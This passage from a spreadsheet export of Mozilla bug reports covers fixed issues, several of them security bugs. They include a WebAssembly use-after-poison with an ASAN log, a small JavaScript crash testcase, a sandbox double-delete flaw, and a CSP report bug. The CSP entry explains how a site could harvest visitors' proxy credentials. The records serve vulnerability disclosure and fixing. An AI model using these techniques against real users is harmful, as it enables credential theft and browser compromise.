multi-dir diffs properly, I tend to diff against cvs-mirror for large diffs.
When I do this (using cvs -d) on the layout directory, I get:
cvs server: failed to create lock directory in repository
`/cvsroot/mozilla/layout/html/tests/table/core': No such file or directory
cvs server: failed to obtain dir lock in repository
`/cvsroot/mozilla/layout/html/tests/table/core'
cvs [server aborted]: read lock failed - giving up
and the diff fails. There are a couple of other core directories in the tests as
well.
imoT (on IRC) mentioned that from cvs-mirror, the directory is never checked
out, and layout/html/tests/tags is also missed.
&lt;rko&gt; rsync misses it if you have --cvs-ignore set and I think we do
&lt;rko&gt; I had to remove it from lounge copy (for bonsai) and it resolved it
&lt;rko&gt; Drew needs to check the mirror</t>
        </is>
      </c>
      <c r="X413" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="414">
      <c r="A414" t="n">
        <v>894370</v>
      </c>
      <c r="B414" t="inlineStr">
        <is>
          <t>2013-07-16 06:21:28 -0700</t>
        </is>
      </c>
      <c r="C414" t="inlineStr">
        <is>
          <t>Assertion failure: inputLen &gt;= spec-&gt;mac_size, at c:/work/mozilla/builds/beta/mozilla/security/nss/lib/ssl/ssl3con.c:2057</t>
        </is>
      </c>
      <c r="D414" t="inlineStr">
        <is>
          <t>2015-02-25 20:16:24 -0800</t>
        </is>
      </c>
      <c r="E414" t="n">
        <v>1</v>
      </c>
      <c r="F414" t="n">
        <v>1</v>
      </c>
      <c r="G414" t="n">
        <v>3</v>
      </c>
      <c r="H414" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I414" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J414" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K414" t="inlineStr">
        <is>
          <t>3.14.3</t>
        </is>
      </c>
      <c r="L414" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M414" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N414" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O414" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P414" t="inlineStr">
        <is>
          <t>[adv-main25+][adv-esr24-1+][adv-esr1710+]</t>
        </is>
      </c>
      <c r="Q414" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R414" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S414" t="inlineStr">
        <is>
          <t>3.15.2</t>
        </is>
      </c>
      <c r="T414" t="n">
        <v>1</v>
      </c>
      <c r="U414" t="n">
        <v>0</v>
      </c>
      <c r="V414" t="n">
        <v>21</v>
      </c>
      <c r="W414" t="inlineStr">
        <is>
          <t>Created attachment 776367
stack
Happens in beta and nightly debug builds on all platforms according to bughunter
Assertion failure: inputLen &gt;= spec-&gt;mac_size, at c:/work/mozilla/builds/beta/mozilla/security/nss/lib/ssl/ssl3con.c:2057
Will try to generate a testcase
Steps to repoduce is to load https://sc.lcsd.gov.hk/uniS/webcat.hkpl.gov.hk/lib/item;jsessionid=1414DB917107CA0666E4352692442460?id=chamo:3207909&amp;theme=WEB&amp;copies-sort=3%2Basc in a debug build and nearly crash on load</t>
        </is>
      </c>
      <c r="X414" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="415">
      <c r="A415" t="n">
        <v>1885829</v>
      </c>
      <c r="B415" t="inlineStr">
        <is>
          <t>2024-03-18 00:26:18 -0700</t>
        </is>
      </c>
      <c r="C415" t="inlineStr">
        <is>
          <t>AddressSanitizer: use-after-poison on js::wasm::AnyRef::isNull</t>
        </is>
      </c>
      <c r="D415" t="inlineStr">
        <is>
          <t>2024-09-18 19:37:05 -0700</t>
        </is>
      </c>
      <c r="E415" t="n">
        <v>1</v>
      </c>
      <c r="F415" t="n">
        <v>1</v>
      </c>
      <c r="G415" t="n">
        <v>3</v>
      </c>
      <c r="H415" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I415" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J415" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K415" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L415" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M415" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N415" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O415" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P415" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][adv-main125+]</t>
        </is>
      </c>
      <c r="Q415" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R415" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S415" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T415" t="n">
        <v>1</v>
      </c>
      <c r="U415" t="n">
        <v>0</v>
      </c>
      <c r="V415" t="n">
        <v>25</v>
      </c>
      <c r="W415" t="inlineStr">
        <is>
          <t>Created attachment 9391684
poc.js
## Reproduce
1. Clone the Firefox mirror from https://github.com/mozilla/gecko-dev
2. Run build command `mkdir fuzzbuild_OPT.OBJ &amp;&amp; cd fuzzbuild_OPT.OBJ &amp;&amp; ../configure --enable-address-sanitizer --disable-jemalloc --enable-debug --enable-optimize --disable-shared-js --enable-application=js --enable-gczeal &amp;&amp; make -j64` in the js/src directory of the firefox checkout
3. Run poc: `js/src/fuzzbuild_OPT.OBJ/dist/bin/js poc.js`
## ASAN LOG
```
==3045212==ERROR: AddressSanitizer: use-after-poison on address 0x24cc639fffa8 at pc 0x55c92c706f47 bp 0x7ffd627ccce0 sp 0x7ffd627cccd8
READ of size 8 at 0x24cc639fffa8 thread T0
/home/test/.mozbuild/clang/bin/llvm-symbolizer: error: '[anon:js-executable-memory]': No such file or directory
    #0 0x55c92c706f46 in js::wasm::AnyRef::isNull() const /home/test/gecko-dev/js/src/wasm/WasmAnyRef.h:290:32
    #1 0x55c92c706f46 in js::wasm::AnyRef::isGCThing() const /home/test/gecko-dev/js/src/wasm/WasmAnyRef.h:291:36
    #2 0x55c92c706f46 in js::gc::StoreBuffer::WasmAnyRefEdge::deref() const /home/test/gecko-dev/js/src/gc/StoreBuffer.h:453:20
    #3 0x55c92dfde4e1 in js::gc::StoreBuffer::WasmAnyRefEdge::maybeInRememberedSet(js::Nursery const&amp;) const /home/test/gecko-dev/js/src/gc/StoreBuffer.h:459:7
    #4 0x55c92dfde35b in void js::gc::StoreBuffer::put&lt;js::gc::StoreBuffer::MonoTypeBuffer&lt;js::gc::StoreBuffer::WasmAnyRefEdge&gt;, js::gc::StoreBuffer::WasmAnyRefEdge&gt;(js::gc::StoreBuffer::MonoTypeBuffer&lt;js::gc::StoreBuffer::WasmAnyRefEdge&gt;&amp;, js::gc::StoreBuffer::WasmAnyRefEdge const&amp;, JS::GCReason) /home/test/gecko-dev/js/src/gc/StoreBuffer.h:497:15
    #5 0x55c92e0195bb in js::gc::StoreBuffer::putWasmAnyRef(js::wasm::AnyRef*) /home/test/gecko-dev/js/src/gc/StoreBuffer.h:595:5
    #6 0x55c92e0195bb in js::wasm::Instance::postBarrier(js::wasm::Instance*, void**) /home/test/gecko-dev/js/src/wasm/WasmInstance.cpp:1409:27
    #7 0x7f3e8aa70702  ([anon:js-executable-memory]+0x11702)
Address 0x24cc639fffa8 is a wild pointer inside of access range of size 0x000000000008.
SUMMARY: AddressSanitizer: use-after-poison /home/test/gecko-dev/js/src/wasm/WasmAnyRef.h:290:32 in js::wasm::AnyRef::isNull() const
Shadow bytes around the buggy address:
  0x24cc639ffd00: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x24cc639ffd80: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x24cc639ffe00: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x24cc639ffe80: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
  0x24cc639fff00: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7
=&gt;0x24cc639fff80: f7 f7 f7 f7 f7[f7]f7 f7 00 00 00 00 00 00 00 00
  0x24cc63a00000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x24cc63a00080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x24cc63a00100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x24cc63a00180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x24cc63a00200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00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3045212==ABORTING
```
## Env
1. Operating system
```
uname -a
Linux test-MZ72-2 5.19.0-32-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon Jan 30 17:03:34 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
```
2. commit
```
commit 529f04f4cd2ae68a0f729ba91cf8985edb23e9d3 (HEAD -&gt; master, origin/master, origin/HEAD)
Author: Jamie Nicol &lt;jnicol@mozilla.com&gt;
Date:   Sun Mar 17 21:30:11 2024 +0000
    Bug 1884791 - Avoid shader miscompilation on some Adreno drivers. r=gw
    Webrender's glslopt-optimized shaders encounter a miscompilation on
    some Adreno driver versions regarding fetching empty clip tasks. This
    patch reshuffles the code in such a way as to avoid the
    bug. Unfortunately the specific cause of the miscompilation remains
    unknown, meaning we must take extra care not to regress it in the
    future.
    Differential Revision: https://phabricator.services.mozilla.com/D204864
```</t>
        </is>
      </c>
      <c r="X415" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="416">
      <c r="A416" t="n">
        <v>139355</v>
      </c>
      <c r="B416" t="inlineStr">
        <is>
          <t>2002-04-22 18:21:43 -0700</t>
        </is>
      </c>
      <c r="C416" t="inlineStr">
        <is>
          <t>Update notifications is broken</t>
        </is>
      </c>
      <c r="D416" t="inlineStr">
        <is>
          <t>2004-11-23 18:54:58 -0800</t>
        </is>
      </c>
      <c r="E416" t="n">
        <v>1</v>
      </c>
      <c r="F416" t="n">
        <v>1</v>
      </c>
      <c r="G416" t="n">
        <v>2</v>
      </c>
      <c r="H416" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I416" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J416" t="inlineStr">
        <is>
          <t>UI Design</t>
        </is>
      </c>
      <c r="K416" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L416" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M416" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N416" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O416" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P416" t="inlineStr">
        <is>
          <t>[adt1]</t>
        </is>
      </c>
      <c r="Q416" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R416" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S416" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T416" t="n">
        <v>1</v>
      </c>
      <c r="U416" t="n">
        <v>0</v>
      </c>
      <c r="V416" t="n">
        <v>13</v>
      </c>
      <c r="W416" t="inlineStr">
        <is>
          <t>Getting the prefs service to use it for getLoclaizedUnicharPref() now causes an
xpconnect exception in the getService() code.  A simple change to the way we
geta  localized unichar pref in nsUserSettings.js as suggested by bnesse fixes
this.  
Nominating for nsbeta1.  This code is not shipped with mozilla.  Only ships in
ns since we have some more work to do on update notifications before we ship it
in mozilla.  But the code is in the mozilla tree since we will eventually ship
it with mozilla as well.</t>
        </is>
      </c>
      <c r="X416" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="417">
      <c r="A417" t="n">
        <v>538219</v>
      </c>
      <c r="B417" t="inlineStr">
        <is>
          <t>2010-01-06 11:40:44 -0800</t>
        </is>
      </c>
      <c r="C417" t="inlineStr">
        <is>
          <t>stage report/list display messed up</t>
        </is>
      </c>
      <c r="D417" t="inlineStr">
        <is>
          <t>2011-12-28 10:40:11 -0800</t>
        </is>
      </c>
      <c r="E417" t="n">
        <v>1</v>
      </c>
      <c r="F417" t="n">
        <v>1</v>
      </c>
      <c r="G417" t="n">
        <v>4</v>
      </c>
      <c r="H417" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I417" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J417" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K417" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L417" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M417" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N417" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O417" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P417" t="inlineStr"/>
      <c r="Q417" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R417" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S417" t="inlineStr">
        <is>
          <t>1.3</t>
        </is>
      </c>
      <c r="T417" t="n">
        <v>1</v>
      </c>
      <c r="U417" t="n">
        <v>0</v>
      </c>
      <c r="V417" t="n">
        <v>2</v>
      </c>
      <c r="W417" t="inlineStr">
        <is>
          <t>http://crash-stats.stage.mozilla.com/report/list?product=Firefox&amp;version=Firefox%3A3.6a2pre&amp;build_id=&amp;query_search=signature&amp;query_type=exact&amp;query=&amp;date=&amp;range_value=1&amp;range_unit=weeks&amp;do_query=1&amp;signature=js3250.dll%400x43b27
is not rendering properly.
Repro:
1) search for Firefox 3.6a2pre
2) Click either link
Actual: page layout is broken
Expected: Sections should be in tabs</t>
        </is>
      </c>
      <c r="X417" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="418">
      <c r="A418" t="n">
        <v>1037666</v>
      </c>
      <c r="B418" t="inlineStr">
        <is>
          <t>2014-07-11 14:40:47 -0700</t>
        </is>
      </c>
      <c r="C418" t="inlineStr">
        <is>
          <t>Crash [@ js::BarrieredBase&lt;js::types::TypeObject*&gt;::operator-&gt;] or Crash [@ js::ScriptSourceObject::initFromOptions] with offThread script</t>
        </is>
      </c>
      <c r="D418" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:03 -0700</t>
        </is>
      </c>
      <c r="E418" t="n">
        <v>1</v>
      </c>
      <c r="F418" t="n">
        <v>1</v>
      </c>
      <c r="G418" t="n">
        <v>3</v>
      </c>
      <c r="H418" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I418" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J418" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K418" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L418" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M418" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N418" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O418" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P418" t="inlineStr">
        <is>
          <t>[jsbugmon:update,bisect][adv-main32+][adv-esr31.1+]</t>
        </is>
      </c>
      <c r="Q418" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R418" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S418" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T418" t="n">
        <v>1</v>
      </c>
      <c r="U418" t="n">
        <v>0</v>
      </c>
      <c r="V418" t="n">
        <v>20</v>
      </c>
      <c r="W418" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision e1a037c085d1 (threadsafe build, run with --fuzzing-safe --thread-count=2 --ion-eager):
var g = newGlobal();
gczeal(2);
offThreadCompileScript('Error()');
g.runOffThreadScript();</t>
        </is>
      </c>
      <c r="X418" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="419">
      <c r="A419" t="n">
        <v>52808</v>
      </c>
      <c r="B419" t="inlineStr">
        <is>
          <t>2000-09-15 10:35:46 -0700</t>
        </is>
      </c>
      <c r="C419" t="inlineStr">
        <is>
          <t>freeze exiting composer with File|Close, File|Quit or Cmd/Ctrl+W</t>
        </is>
      </c>
      <c r="D419" t="inlineStr">
        <is>
          <t>2000-12-15 18:37:58 -0800</t>
        </is>
      </c>
      <c r="E419" t="n">
        <v>1</v>
      </c>
      <c r="F419" t="n">
        <v>1</v>
      </c>
      <c r="G419" t="n">
        <v>3</v>
      </c>
      <c r="H419" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I419" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J419" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K419" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L419" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M419" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N419" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O419" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P419" t="inlineStr">
        <is>
          <t>[rtm++][p:1]</t>
        </is>
      </c>
      <c r="Q419" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R419" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S419" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T419" t="n">
        <v>1</v>
      </c>
      <c r="U419" t="n">
        <v>0</v>
      </c>
      <c r="V419" t="n">
        <v>64</v>
      </c>
      <c r="W419" t="inlineStr">
        <is>
          <t>Exiting composer causes all 3 platforms to crash. This is a smoketest blocker.
cc: cmanske
Putting this in editor for triange.</t>
        </is>
      </c>
      <c r="X419" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="420">
      <c r="A420" t="n">
        <v>1193867</v>
      </c>
      <c r="B420" t="inlineStr">
        <is>
          <t>2015-08-12 10:58:46 -0700</t>
        </is>
      </c>
      <c r="C420" t="inlineStr">
        <is>
          <t>Update Tiles data in a Service Worker</t>
        </is>
      </c>
      <c r="D420" t="inlineStr">
        <is>
          <t>2016-01-12 13:33:54 -0800</t>
        </is>
      </c>
      <c r="E420" t="n">
        <v>1</v>
      </c>
      <c r="F420" t="n">
        <v>1</v>
      </c>
      <c r="G420" t="n">
        <v>2</v>
      </c>
      <c r="H420" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I420" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J420" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K420" t="inlineStr">
        <is>
          <t>43 Branch</t>
        </is>
      </c>
      <c r="L420" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M420" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N420" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O420" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P420" t="inlineStr"/>
      <c r="Q420" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R420" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S420" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T420" t="n">
        <v>1</v>
      </c>
      <c r="U420" t="n">
        <v>0</v>
      </c>
      <c r="V420" t="n">
        <v>4</v>
      </c>
      <c r="W420" t="inlineStr">
        <is>
          <t>Use a service worker registered in the remotely hosted newtab page to fetch and store data from the Tiles service.
update channel and locale data will be provided on boot-up.</t>
        </is>
      </c>
      <c r="X420" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="421">
      <c r="A421" t="n">
        <v>1283823</v>
      </c>
      <c r="B421" t="inlineStr">
        <is>
          <t>2016-07-01 04:09:11 -0700</t>
        </is>
      </c>
      <c r="C421" t="inlineStr">
        <is>
          <t>Crash in mozilla::net::Http2Session::ReadSegmentsAgain</t>
        </is>
      </c>
      <c r="D421" t="inlineStr">
        <is>
          <t>2016-08-08 11:56:33 -0700</t>
        </is>
      </c>
      <c r="E421" t="n">
        <v>1</v>
      </c>
      <c r="F421" t="n">
        <v>1</v>
      </c>
      <c r="G421" t="n">
        <v>3</v>
      </c>
      <c r="H421" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I421" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J421" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K421" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L421" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M421" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N421" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O421" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P421" t="inlineStr">
        <is>
          <t>[spdy][necko-active][adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q421" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R421" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S421" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T421" t="n">
        <v>1</v>
      </c>
      <c r="U421" t="n">
        <v>0</v>
      </c>
      <c r="V421" t="n">
        <v>30</v>
      </c>
      <c r="W421" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-5679b845-1c0e-411e-b90a-5e96e2160701.
=============================================================
Crashing Thread (6)
Frame 	Module 	Signature 	Source
0 	xul.dll 	mozilla::net::Http2Session::ReadSegmentsAgain(mozilla::net::nsAHttpSegmentReader*, unsigned int, unsigned int*, bool*) 	netwerk/protocol/http/Http2Session.cpp:2302
1 	xul.dll 	mozilla::net::nsHttpConnection::OnSocketWritable() 	netwerk/protocol/http/nsHttpConnection.cpp:1603
2 	xul.dll 	mozilla::net::nsHttpConnection::OnOutputStreamReady(nsIAsyncOutputStream*) 	netwerk/protocol/http/nsHttpConnection.cpp:2109
3 	xul.dll 	nsSocketOutputStream::OnSocketReady(nsresult) 	netwerk/base/nsSocketTransport2.cpp:552
this crash signature seems to be regressing since firefox 45 - primarily on fennec so far.
in the last few days it's also significantly rising on firefox desktop, in a manual spot-check of affected crash reports it seems that they are those users are having the addon firefox@zenmate.com https://addons.mozilla.org/firefox/addon/zenmate-security-privacy-vpn/ (300k users) present. the 5.5.3 update of the extension on june 28 is coinciding with the crash spike on firefox desktop.</t>
        </is>
      </c>
      <c r="X421" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="422">
      <c r="A422" t="n">
        <v>664983</v>
      </c>
      <c r="B422" t="inlineStr">
        <is>
          <t>2011-06-17 05:45:30 -0700</t>
        </is>
      </c>
      <c r="C422" t="inlineStr">
        <is>
          <t>Content Security Policy, violation reports, leak web proxy credentials</t>
        </is>
      </c>
      <c r="D422" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:59 -0700</t>
        </is>
      </c>
      <c r="E422" t="n">
        <v>1</v>
      </c>
      <c r="F422" t="n">
        <v>1</v>
      </c>
      <c r="G422" t="n">
        <v>3</v>
      </c>
      <c r="H422" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I422" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J422" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K422" t="inlineStr">
        <is>
          <t>8 Branch</t>
        </is>
      </c>
      <c r="L422" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M422" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N422" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O422" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P422" t="inlineStr">
        <is>
          <t>[sg:high][qa-]</t>
        </is>
      </c>
      <c r="Q422" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R422" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S422" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T422" t="n">
        <v>1</v>
      </c>
      <c r="U422" t="n">
        <v>0</v>
      </c>
      <c r="V422" t="n">
        <v>23</v>
      </c>
      <c r="W422" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Build Identifier: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
When Firefox 4 sends a Content Security Policy report due to a violation, it sends the full set of HTTP request headers that would have been used in the request. Including the Proxy-Authorization HTTP request header. This request header normally contains the base64 encoded username/password that the browser is using to authenticate against a web proxy. Web proxies typically strip this header before forwarding on the request.
Because the CSP report contains this header stuffed in some JSON in the POST data, it is not stripped. All a website owner has to do is purposefully violate their own CSP policy so that every visitor generates a CSP violation report, and then scan those reports for Proxy-Authorization data.
I have prepared a blog post describing this vulnerability and will be publishing it early next week.
I don't believe it is necessary to send *any* of the HTTP headers in the CSP violation report. It is certainly dangerous to send Proxy-Authorization and Cookie headers.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X422" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="423">
      <c r="A423" t="n">
        <v>1848454</v>
      </c>
      <c r="B423" t="inlineStr">
        <is>
          <t>2023-08-11 16:42:07 -0700</t>
        </is>
      </c>
      <c r="C423" t="inlineStr">
        <is>
          <t>Double-delete UAF in BrokerServicesBase::SpawnTarget()</t>
        </is>
      </c>
      <c r="D423" t="inlineStr">
        <is>
          <t>2024-05-30 11:13:40 -0700</t>
        </is>
      </c>
      <c r="E423" t="n">
        <v>1</v>
      </c>
      <c r="F423" t="n">
        <v>1</v>
      </c>
      <c r="G423" t="n">
        <v>3</v>
      </c>
      <c r="H423" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I423" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J423" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K423" t="inlineStr">
        <is>
          <t>Firefox 116</t>
        </is>
      </c>
      <c r="L423" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M423" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N423" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O423" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P423" t="inlineStr">
        <is>
          <t>[adv-main118+][adv-esr115.3+]</t>
        </is>
      </c>
      <c r="Q423" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R423" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S423" t="inlineStr">
        <is>
          <t>118 Branch</t>
        </is>
      </c>
      <c r="T423" t="n">
        <v>1</v>
      </c>
      <c r="U423" t="n">
        <v>0</v>
      </c>
      <c r="V423" t="n">
        <v>25</v>
      </c>
      <c r="W423" t="inlineStr">
        <is>
          <t>`BrokerServicesBase::SpawnTarget()` (`security/sandbox/chromium/sandbox/win/src/broker_services.cc`) can cause a double-delete UAF if Windows cannot duplicate a handle [1]. The bug is in the `!job.IsValid()` case (see lines 662 et seq below). If `AddTargetPeerInternal()` fails (which can occur if the Windows API `DuplicateHandle()` returns error), then `SpawnTarget()` calls `SpawnCleanup(target)`, which does `delete target`. But line 638 in `SpawnTarget()` already called `policy_base-&gt;AddTarget(target)`, which adds `target` to `policy_base-&gt;targets_`, which is a list of raw pointers. When `policy_base`'s reference count goes to 0, its destructor `PolicyBase::~PolicyBase()` (`security/sandbox/chromium/sandbox/win/src/sandbox_policy_base.cc`) does:
```
   122: TargetSet::iterator it;
   123: for (it = targets_.begin(); it != targets_.end(); ++it) {
   124:    TargetProcess* target = (*it);
   125:    delete target; // BOOM!
   126: }
```
thus causing a double-delete UAF.
```
   423: ResultCode BrokerServicesBase::SpawnTarget(...
   ...
   426:                                            scoped_refptr&lt;TargetPolicy&gt; policy...) {
   ...
   457:   scoped_refptr&lt;PolicyBase&gt; policy_base(static_cast&lt;PolicyBase*&gt;(policy.get()));
   ...
   637:   // Now the policy is the owner of the target.
   638:   result = policy_base-&gt;AddTarget(target);
   ...
   646:   if (job.IsValid()) {
   ...
   662:   } else {
